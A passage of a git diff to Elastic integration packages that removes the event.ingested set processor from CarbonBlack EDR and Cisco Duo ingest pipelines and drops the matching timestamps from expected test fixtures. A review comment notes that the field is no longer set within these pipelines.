"event", "type": [ "connection", @@ -1160,7 +1134,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120911807Z", "kind": "event" }, "host": { @@ -1248,7 +1221,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120912538Z", "kind": "event", "type": [ "change" 
@@ -1286,7 +1258,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120913263Z", "kind": "event", "type": [ "info" @@ -1327,7 +1298,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120914003Z", "kind": "event" }, "observer": { @@ -1365,7 +1335,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120914730Z", "kind": "event", "type": [ "info" @@ -1416,7 +1385,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120915476Z", "kind": "event", "type": [ "connection", @@ -1479,7 +1447,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120916203Z", "kind": "event" }, "file": { @@ -1559,7 +1526,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120916931Z", "kind": "event", "type": [ "change" @@ -1597,7 +1563,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120917751Z", "kind": "event", "type": [ "info" @@ -1635,7 +1600,6 @@ "process", "driver" ], - "ingested": "2022-01-25T07:41:27.120918479Z", "kind": "event", "type": [ "info" @@ -1676,7 +1640,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120919209Z", "kind": "event" }, "observer": { @@ -1714,7 +1677,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120919938Z", "kind": "event", "type": [ "info" @@ -1767,7 +1729,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120920671Z", "kind": "event", "type": [ "connection", @@ -1825,7 +1786,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120921399Z", "kind": "event" }, "host": { @@ -1900,7 +1860,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120922143Z", "kind": "event", "type": [ "change" @@ -1938,7 +1897,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120922890Z", "kind": "event", "type": [ "info" 
@@ -1976,7 +1934,6 @@ "process", "driver" ], - "ingested": "2022-01-25T07:41:27.120923633Z", "kind": "event", "type": [ "info" @@ -2017,7 +1974,6 @@ "category": [ "host" ], - "ingested": "2022-01-25T07:41:27.120924363Z", "kind": "event", "type": [ "info" @@ -2061,7 +2017,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120925100Z", "kind": "event" }, "observer": { @@ -2099,7 +2054,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120925842Z", "kind": "event", "type": [ "info" @@ -2150,7 +2104,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120926580Z", "kind": "event", "type": [ "connection", @@ -2216,7 +2169,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120927323Z", "kind": "event" }, "file": { @@ -2281,7 +2233,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120928054Z", "kind": "event", "type": [ "change" @@ -2319,7 +2270,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120928817Z", "kind": "event", "type": [ "info" @@ -2357,7 +2307,6 @@ "process", "driver" ], - "ingested": "2022-01-25T07:41:27.120929659Z", "kind": "event", "type": [ "info" @@ -2398,7 +2347,6 @@ "category": [ "host" ], - "ingested": "2022-01-25T07:41:27.120930392Z", "kind": "event", "type": [ "info" @@ -2442,7 +2390,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120931124Z", "kind": "event" }, "observer": { @@ -2488,7 +2435,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120931882Z", "kind": "event", "type": [ "start", @@ -2533,7 +2479,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120932619Z", "kind": "event", "type": [ "info" @@ -2584,7 +2529,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120933365Z", "kind": "event", "type": [ "connection", 
@@ -2618,7 +2562,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120934112Z", "kind": "event" }, "observer": { @@ -2662,7 +2605,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120934840Z", "kind": "event", "type": [ "change" @@ -2700,7 +2642,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120935574Z", "kind": "event", "type": [ "info" @@ -2738,7 +2679,6 @@ "process", "driver" ], - "ingested": "2022-01-25T07:41:27.120936332Z", "kind": "event", "type": [ "info" @@ -2779,7 +2719,6 @@ "category": [ "host" ], - "ingested": "2022-01-25T07:41:27.120937079Z", "kind": "event", "type": [ "info" @@ -2823,7 +2762,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120937819Z", "kind": "event" }, "observer": { @@ -2869,7 +2807,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120938554Z", "kind": "event", "type": [ "start", @@ -2914,7 +2851,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120939281Z", "kind": "event", "type": [ "info" @@ -2964,7 +2900,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120940044Z", "kind": "event", "type": [ "connection", @@ -3003,7 +2938,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120940836Z", "kind": "event" }, "host": { @@ -3054,7 +2988,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120941579Z", "kind": "event", "type": [ "info" @@ -3102,7 +3035,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120942319Z", "kind": "event", "type": [ "change" @@ -3140,7 +3072,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120943044Z", "kind": "event", "type": [ "info" @@ -3178,7 +3109,6 @@ "process", "driver" ], - "ingested": "2022-01-25T07:41:27.120943775Z", "kind": "event", "type": [ "info" @@ -3219,7 +3149,6 @@ "category": [ "host" ], - "ingested": "2022-01-25T07:41:27.120944504Z", "kind": "event", "type": [ "info" 
@@ -3263,7 +3192,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120945269Z", "kind": "event" }, "observer": { @@ -3309,7 +3237,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120946004Z", "kind": "event", "type": [ "start", @@ -3354,7 +3281,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120946729Z", "kind": "event", "type": [ "info" @@ -3405,7 +3331,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120947572Z", "kind": "event", "type": [ "connection", @@ -3437,7 +3362,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120948375Z", "kind": "event" }, "file": { @@ -3489,7 +3413,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120949110Z", "kind": "event", "type": [ "info" @@ -3537,7 +3460,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120949847Z", "kind": "event", "type": [ "change" @@ -3589,7 +3511,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120950586Z", "kind": "event", "type": [ "start", @@ -3628,7 +3549,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120951314Z", "kind": "event", "type": [ "info" @@ -3666,7 +3586,6 @@ "process", "driver" ], - "ingested": "2022-01-25T07:41:27.120952094Z", "kind": "event", "type": [ "info" @@ -3711,7 +3630,6 @@ "category": [ "host" ], - "ingested": "2022-01-25T07:41:27.120952826Z", "kind": "event", "type": [ "info" @@ -3755,7 +3673,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120953567Z", "kind": "event" }, "observer": { @@ -3801,7 +3718,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120954304Z", "kind": "event", "type": [ "start", @@ -3846,7 +3762,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120955059Z", "kind": "event", "type": [ "info" 
@@ -3896,7 +3811,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120955786Z", "kind": "event", "type": [ "connection", @@ -3940,7 +3854,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120956684Z", "kind": "event", "type": [ "change" @@ -3995,7 +3908,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120957412Z", "kind": "event", "type": [ "info" @@ -4043,7 +3955,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120958161Z", "kind": "event", "type": [ "change" @@ -4095,7 +4006,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120958921Z", "kind": "event", "type": [ "start", @@ -4134,7 +4044,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120959660Z", "kind": "event", "type": [ "info" @@ -4184,7 +4093,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120960564Z", "kind": "event", "type": [ "change" @@ -4225,7 +4133,6 @@ "category": [ "host" ], - "ingested": "2022-01-25T07:41:27.120961317Z", "kind": "event", "type": [ "info" @@ -4269,7 +4176,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120962051Z", "kind": "event" }, "observer": { @@ -4315,7 +4221,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120962806Z", "kind": "event", "type": [ "start", @@ -4360,7 +4265,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120963537Z", "kind": "event", "type": [ "info" @@ -4410,7 +4314,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120964289Z", "kind": "event", "type": [ "connection", @@ -4456,7 +4359,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120965089Z", "kind": "event", "type": [ "change" @@ -4508,7 +4410,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120965822Z", "kind": "event", "type": [ "info" 
diff --git a/packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml index a10ab732a9e..aec93b30b72 100644 --- a/packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -1,10 +1,6 @@ --- description: Pipeline for parsing CarbonBlack EDR logs processors: -- set: - field: event.ingested - value: '{{_ingest.timestamp}}' - - set: field: ecs.version value: 8.2.0 diff --git a/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json b/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json index 2a24c4b898e..75228da11a2 100644 --- a/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json +++ b/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json @@ -7,7 +7,6 @@ }, "event": { "action": "activation_begin", - "ingested": "2021-12-29T09:37:47.270933529Z", "original": "{\"action\":\"activation_begin\",\"description\":null,\"isotimestamp\":\"2021-07-20T11: 41: 31+00: 00\",\"object\":null,\"timestamp\":1626781291,\"username\":\"narroway\"}", "kind": "event", "outcome": "success" @@ -33,7 +32,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:47.270944711Z", "original": "{\"action\":\"admin_activate_duo_push\",\"description\":\"{\\\"number\\\": \\\"+12345678901\\\", \\\"extension\\\": \\\"\\\"}\",\"isotimestamp\":\"2021-07-20T11:44:37+00:00\",\"object\":\"940-967-2177\",\"timestamp\":1626781477,\"username\":\"\"}", "kind": "event", "action": "admin_activate_duo_push", 
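Review bot: With the `set` processor for `event.ingested` removed at the top of the carbonblack_edr `default.yml` hunk, nothing in this pipeline stamps the ingest time any more, and the hunk does not say what is expected to do it instead. The same removal is made in the cisco_duo admin, auth, offline_enrollment, summary and telephony `default.yml` hunks further down, and the expected-output fixtures drop `event.ingested` as well, so the pipeline tests no longer cover the field. If it is now populated after these pipelines run (presumably by the Fleet final pipeline, which is not visible here), a comment under `processors:` would record that, e.g. `# event.ingested is not set here; it is added after this pipeline runs (confirm where)`. This matters for anything that orders or windows events on ingest time, such as a detection rule using `event.ingested` as its timestamp override, because documents indexed through these pipelines without that later step would lack the field. The processors list continues past the end of each of these hunks.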
@@ -69,7 +67,6 @@ "event": { "reason": "Starting activation process", "action": "activation_begin", - "ingested": "2021-12-29T09:37:47.270947855Z", "original": "{\"action\":\"activation_begin\",\"description\":\"Starting activation process\",\"isotimestamp\":\"2021-07-20T11: 41: 31+00: 00\",\"object\":null,\"timestamp\":1626781291,\"username\":\"narroway\"}", "kind": "event", "outcome": "success" @@ -97,7 +94,6 @@ }, "event": { "action": "activation_set_password", - "ingested": "2021-12-29T09:37:47.270948731Z", "original": "{\"action\":\"activation_set_password\",\"description\":null,\"isotimestamp\":\"2021-07-20T11: 44: 09+00: 00\",\"object\":\"narroway\",\"timestamp\":1626781449,\"username\":\"narroway\"}", "kind": "event", "outcome": "success" @@ -127,7 +123,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:47.270949599Z", "original": "{\"action\":\"admin_self_activate\",\"description\":\"{\\\"name\\\": \\\"narroway\\\", \\\"phone\\\": \\\"+12345678901\\\", \\\"is_temporary_password\\\": false, \\\"email\\\": \\\"narroway@example.com\\\", \\\"hardtoken\\\": null, \\\"role\\\": \\\"Owner\\\", \\\"status\\\": \\\"Pending Activation\\\", \\\"restricted_by_admin_units\\\": false, \\\"administrative_units\\\": \\\"\\\"}\",\"isotimestamp\":\"2021-07-20T11:44:37+00:00\",\"object\":\"jsmith\",\"timestamp\":1626781477,\"username\":\"narroway\"}", "kind": "event", "action": "admin_self_activate", @@ -172,7 +167,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:47.270950423Z", "original": "{\"action\":\"admin_update\",\"description\":\"{\\\"phone\\\": \\\"+451234567890\\\"}\",\"isotimestamp\":\"2021-07-20T11:45:11+00:00\",\"object\":\"narroway\",\"timestamp\":1626781511,\"username\":\"narroway\"}", "kind": "event", "action": "admin_update", 
@@ -211,7 +205,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:47.270951256Z", "original": "{\"action\":\"user_update\",\"description\":\"{\\\"realname\\\": \\\"test 4\\\", \\\"Sync Ref. Code\\\": \\\"41c7e5714a91d17dea11157539d5d1ac\\\"}\",\"isotimestamp\":\"2021-07-20T11:45:11+00:00\",\"object\":\"narroway\",\"timestamp\":1626781511,\"username\":\"narroway\"}", "kind": "event", "action": "user_update", @@ -254,7 +247,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:47.270952063Z", "original": "{\"action\":\"user_update\",\"description\":\"{\\\"email\\\": \\\"narroway@example.com\\\", \\\"Sync Ref. Code\\\": \\\"41c7e5714a91d17dea11157539d5d1ac\\\"}\",\"isotimestamp\":\"2021-07-20T11:45:11+00:00\",\"object\":\"narroway\",\"timestamp\":1626781511,\"username\":\"narroway\"}", "kind": "event", "action": "user_update", diff --git a/packages/cisco_duo/data_stream/admin/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/admin/elasticsearch/ingest_pipeline/default.yml index dcbe5374d7f..a04630fdb1e 100644 --- a/packages/cisco_duo/data_stream/admin/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/admin/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for parsing cisco_duo administrator logs processors: - - set: - field: event.ingested - value: "{{{_ingest.timestamp}}}" - set: field: ecs.version value: '8.2.0' diff --git a/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json b/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json index e81ad507f86..06b94ca0551 100644 --- a/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json +++ b/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json 
@@ -46,7 +46,6 @@ }, "event": { "reason": "user_approved", - "ingested": "2021-12-29T09:37:48.755124421Z", "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"67.0.3396.99\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":true,\"is_firewall_enabled\":true,\"is_password_set\":true,\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Mac OS X\",\"os_version\":\"10.14.1\",\"security_agents\":[]},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Microsoft Azure Active Directory\"},\"auth_device\":{\"ip\":\"192.168.225.254\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"My iPhone X (734-555-2342)\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2020-02-13T18:56:20.351346+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1581620180,\"trusted_endpoint_status\":\"not trusted\",\"txid\":\"340a23e3-23f3-23c1-87dc-1491a23dfdbb\",\"user\":{\"groups\":[\"Duo Users\",\"CorpHQ Users\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway@example.com\"}}", "kind": "event", "category": "authentication", 
@@ -151,7 +150,6 @@ }, "event": { "reason": "user_approved", - "ingested": "2021-12-29T09:37:48.755127038Z", "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"89.160.20.156\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:21:51.271776+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1627024911,\"txid\":\"fa59a691-9139-43e9-9854-f9e1dbf72af5\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}", "kind": "event", "category": "authentication", 
@@ -273,7 +271,6 @@ }, "event": { "reason": "user_approved", - "ingested": "2021-12-29T09:37:48.755127957Z", "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.131\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"89.160.20.156\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-08-12T09:14:23.060168+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1628759663,\"txid\":\"861a81e7-1f60-4865-95eb-57d9c43ce073\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}", "kind": "event", "category": "authentication", 
@@ -394,7 +391,6 @@ }, "event": { "reason": "user_marked_fraud", - "ingested": "2021-12-29T09:37:48.755128760Z", "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"89.160.20.156\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:20:54.700050+00:00\",\"ood_software\":null,\"reason\":\"user_marked_fraud\",\"result\":\"fraud\",\"timestamp\":1627024854,\"txid\":\"78e1a910-350b-4226-828b-edb0ac2f2e3c\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}", "kind": "event", "category": "authentication", 
@@ -513,7 +509,6 @@ }, "event": { "reason": "user_mistake", - "ingested": "2021-12-29T09:37:48.755129544Z", "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"89.160.20.156\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:19:34.702203+00:00\",\"ood_software\":null,\"reason\":\"user_mistake\",\"result\":\"denied\",\"timestamp\":1627024774,\"txid\":\"e22120cd-7388-424f-aa0a-b60cad42d8f3\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}", "kind": "event", "category": "authentication", diff --git a/packages/cisco_duo/data_stream/auth/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/auth/elasticsearch/ingest_pipeline/default.yml index 3e28b25521b..0d9a3bbece6 100644 --- a/packages/cisco_duo/data_stream/auth/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/auth/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for parsing cisco_duo authentication logs processors: - - set: - field: event.ingested - value: "{{{_ingest.timestamp}}}" - set: field: ecs.version value: '8.2.0' 
diff --git a/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json b/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json index d0c1e3cf4f2..9194ba9a93b 100644 --- a/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json +++ b/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json @@ -6,7 +6,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:52.266080492Z", "original": "{\"action\": \"o2fa_user_provisioned\",\"description\": \"{\\\"user_agent\\\": \\\"DuoCredProv/4.0.6.413 (Windows NT 6.3.9600; x64; Server)\\\", \\\"hostname\\\": \\\"WKSW10x64\\\", \\\"factor\\\": \\\"duo_otp\\\"}\",\"isotimestamp\": \"2019-08-30T16:10:05+00:00\",\"object\": \"Acme Laptop Windows Logon\",\"timestamp\": 1567181405,\"username\": \"narroway\"}" }, "user": { diff --git a/packages/cisco_duo/data_stream/offline_enrollment/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/offline_enrollment/elasticsearch/ingest_pipeline/default.yml index 755b4a4013c..929f83a3ff7 100644 --- a/packages/cisco_duo/data_stream/offline_enrollment/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/offline_enrollment/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for parsing cisco_duo offline enrollment logs processors: - - set: - field: event.ingested - value: "{{{_ingest.timestamp}}}" - set: field: ecs.version value: '8.2.0' diff --git a/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json b/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json index 612fc2e848f..7fbaf55f25c 100644 --- a/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json 
+++ b/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json @@ -6,7 +6,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:52.958306807Z", "original": "{\"response\":{\"admin_count\":6,\"integration_count\":5,\"telephony_credits_remaining\":473,\"user_count\":4},\"stat\":\"OK\"}" }, "tags": [ @@ -27,7 +26,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:52.958309870Z", "original": "{\"response\":{\"admin_count\":3,\"integration_count\":9,\"telephony_credits_remaining\":960,\"user_count\":8},\"stat\":\"OK\"}" }, "tags": [ diff --git a/packages/cisco_duo/data_stream/summary/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/summary/elasticsearch/ingest_pipeline/default.yml index c39d30bf54b..89fe7b88015 100644 --- a/packages/cisco_duo/data_stream/summary/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/summary/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for parsing cisco_duo summary logs processors: - - set: - field: event.ingested - value: "{{{_ingest.timestamp}}}" - set: field: ecs.version value: '8.2.0' diff --git a/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json b/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json index 1fec8c77f96..c174665f093 100644 --- a/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json +++ b/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json @@ -6,7 +6,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:53.175332756Z", "kind": "event", "original": "{\"context\":\"administrator login\",\"credits\":5,\"isotimestamp\":\"2021-07-22T12:59:30+00:00\",\"phone\":\"+121234512345\",\"timestamp\":1626958770,\"type\":\"phone\"}" }, 
@@ -28,7 +27,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:53.175335209Z", "kind": "event", "original": "{\"context\":\"verify\",\"credits\":1,\"isotimestamp\":\"2021-08-16T06:03:32+00:00\",\"phone\":\"+121234512345\",\"timestamp\":1629093812,\"type\":\"sms\"}" }, @@ -50,7 +48,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:53.175336142Z", "kind": "event", "original": "{\"context\": \"authentication\",\"credits\": 1,\"isotimestamp\":\"2020-03-20T15:38:12+00:00\",\"phone\":\"+121234512345\",\"timestamp\":1584718692,\"type\":\"sms\"}" }, diff --git a/packages/cisco_duo/data_stream/telephony/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/telephony/elasticsearch/ingest_pipeline/default.yml index 1dff8344ee3..652f4fc4ff6 100644 --- a/packages/cisco_duo/data_stream/telephony/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/telephony/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for parsing cisco_duo telephony logs processors: - - set: - field: event.ingested - value: "{{{_ingest.timestamp}}}" - set: field: ecs.version value: '8.2.0' diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json index 06707472aa0..e2ff47949be 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -57,7 +57,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:05.081546387Z", "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to 